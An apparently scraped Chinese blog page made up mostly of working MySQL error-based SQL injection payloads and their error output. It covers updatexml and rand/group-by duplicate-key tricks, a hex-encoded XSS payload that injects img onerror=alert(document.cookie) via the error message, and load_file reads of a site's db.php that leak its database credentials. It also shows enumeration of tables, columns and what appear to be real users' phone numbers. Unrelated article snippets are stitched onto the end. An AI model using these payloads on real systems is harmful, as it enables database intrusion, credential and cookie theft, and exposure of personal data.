报错是如何转为xss的?

mysql语句在页面报错,泄露信息

=========================================================================================================================================================================

*	报错方式之“updatexml”,有字数限制,但无需配合union。

	-	mysql> select updatexml(1, concat(':', 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: ':test'

	-	mysql> select updatexml(1, concat(0x3a, 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: ':test'

	-	mysql> select updatexml(1, concat(0x5e, 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: '^test'

	-	mysql>  select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, 'test'),1);

			ERROR 1105 (HY000): XPATH syntax error: '^test'

	**	将上面‘test’换成你的子查询语句或函数均可。

*	group by+rand(0)+having,无字数限制,无需配合union。

	-	mysql>  select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);

			ERROR 1062 (23000): Duplicate entry '5.6.21-log~1' for key 'group_key'

*	报错方式之“rand+count+group by”,需配合union

	rand(0)无论在哪台机器运行多少次,生成的序列都是一样的

	参考mysql开发者社区曝光的bug http://bugs.mysql.com/bug.php?id=8652

	-	mysql>  select 1,2,count(*),concat('test', char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;

			ERROR 1062 (23000): Duplicate entry 'test^1' for key 'group_key'

	-	mysql>  select 1,2,count(*),concat('test', char(0x5e), left(rand(0),3))x from information_schema.tables group by x;

			ERROR 1062 (23000): Duplicate entry 'test^0.7' for key 'group_key'

	**	将上面‘test’换成你的子查询语句或函数均可。

mysql转xss语句

	mysql>  select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '/><img src="fuck" onerror=alert(document.cookie)>^0.7' for key 'group_key'

直接爆配置文件密码,前提是有file权限

	mysql>	select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':	'DB_NAME'   => 'fan******un','

	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':	'DB_USER'   => 's*********b', /'

	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':PWD'    => 'hahahaahhah','

爆版本

	mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;

		ERROR 1062 (23000): Duplicate entry '5.6.21-log1' for key 'group_key'

爆库名

	mysql> select info();

		ERROR 1305 (42000): FUNCTION fangjiangjun.info does not exist

	mysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'fangjiangjun^1' for key 'group_key'

爆表名

	mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'COLLATIONS^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'COLLATION_CHARACTER_SET_APPLICABILITY^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'f_admin^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'f_admin_role^1' for key 'group_key'

爆字段名

	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'id^1' for key 'group_key'

	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'login_time^1' for key 'group_key'

爆字段值

	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '18602029479^1' for key 'group_key'

	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '15602267509^1' for key 'group_key'

  

mysql基于“报错”的注入的更多相关文章

  1. sql注入--基于报错的注入

    这是经典的sqli-labs 中的less-5 问题首先通过几个常见的进行测试, 发现只要正确的话就会输出you are in.... 并不能绕过,因此不能出现敏感信息,因此要用一种新思路(参考白帽学 ...

  2. 2019-9-9:渗透测试,基础学习,phpmyadmin getshell方法,基于时间的盲注,基于报错的注入,笔记

    phpmyadmin getshell方法1,查看是否有导入导出设置 show global variables like '%secure-file-priv%';2,如果secure-file-p ...

  3. MySQL基于报错注入2

    目标站点: 0x1 注入点判断 http://www.xxxxxx.com/pages/services.php?id=1 #true http://www.xxxxxx.com/pages/serv ...

  4. MySQL基于报错注入1

    0x1 判断注入点: http://www.xxxx.ro/s.php?id=1' 那么尝试闭合下单引号 http://www.xxxx.ro/s.php?id=1' --+ 0x2 枚举下表的列 h ...

  5. sqli-labs:1-4,基于报错的注入

    sqli1: 脚本 # -*- coding: utf-8 -*- """ Created on Sat Mar 23 09:37:14 2019 @author: ke ...

  6. Mysql报错型注入总结

    Mysql注入虽然是老生常谈的问题,但是工作中更多的是使用sqlmap等工具进行注入测试的,原理方面还是不是很清楚,所以这段时间主要是自己搭建环境在学手工注入,简单的将自己的学习做一个总结和记录.在常 ...

  7. python 3.5.2安装mysql驱动报错

    python 3.5.2安装mysql驱动报错 python 3.5.2安装mysql驱动时出现如下异常: [root@localhost www]# pip install mysql-connec ...

  8. Loadrunner参数化连接oracle、mysql数据源报错及解决办法

    Loadrunner参数化连接oracle.mysql数据源报错及解决办法 (本人系统是Win7 64,  两位小伙伴因为是默认安装lr,安装在 最终参数化的时候,出现连接字符串无法自动加载出来: 最 ...

  9. 连接mysql数据库报错java.sql.SQLException: The server time zone value '�й���׼ʱ��' is unrecognized...解决方法

    今天连接mysql数据库报错如下: java.sql.SQLException: The server time zone value '�й���׼ʱ��' is unrecognized or r ...

随机推荐

  1. 禁用Windows重复数据删除

    重复数据删除,可以减少磁盘占用,但使用不当也有可能增加IO,另外,也为此功能会将硬盘分块,所以当硬盘占用较高时,进行碎片整理也比较困难,所以有时需要禁用掉重复数据删除功能,并解除重复数据的优化,可以通 ...

  2. L2-011. 玩转二叉树

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAA28AAAHQCAIAAAC5rsUiAAAgAElEQVR4nO3dzYts953n+foXcpUL0Q

  3. Mybatis

    Mybatis MyBatis本是apache的一个开源项目iBatis,2010年这个项目有Apache software foundation 迁移到了Google code,并改名MyBatis ...

  4. springMVC注解初步

    一.(补充)视图解析器---XmlViewResolver 作用:分离配置信息. 在视图解析器---BeanNameViewResolver的基础之上进行扩充,新建一个myView.xml分离信息 在 ...

  5. 解读ASP.NET 5 & MVC6系列(11):Routing路由

    新版Routing功能介绍 在ASP.NET 5和MVC6中,Routing功能被全部重写了,虽然用法有些类似,但和之前的Routing原理完全不太一样了,该Routing框架不仅可以支持MVC和We ...

  6. [LeetCode] Power of Two 判断2的次方数

    Given an integer, write a function to determine if it is a power of two. Hint: Could you solve it in ...

  7. [LeetCode] Remove Duplicates from Sorted List II 移除有序链表中的重复项之二

    Given a sorted linked list, delete all nodes that have duplicate numbers, leaving only distinct numb ...

  8. 腾讯 auth_token

    auth_token 从cookies里取出supertoken=2881515311; function auth_token(str) { var hash = 0; for (var i = 0 ...

  9. PRINCE2随笔

    首先要说的是,我这篇体会是针对一定的背景的,不能算是一种通用的管理方式,只能是我自己的经验总结,能给大家平常的管理提供一点思路,我就很满足了. 先说说背景,我所在公司做的是大型桌面应用软件,简单点说就 ...

  10. tomcat7下对HTTPS的部署配置

    1.申请CA证书,可以在腾讯云或者阿里云申请到免费的CA,不过前提是,你要有太服务器和域名,并且解析过域名. 2.下载申请到的CA证书到本地,在tomcat7上进行相关配置. 3.Tomcat 证书部 ...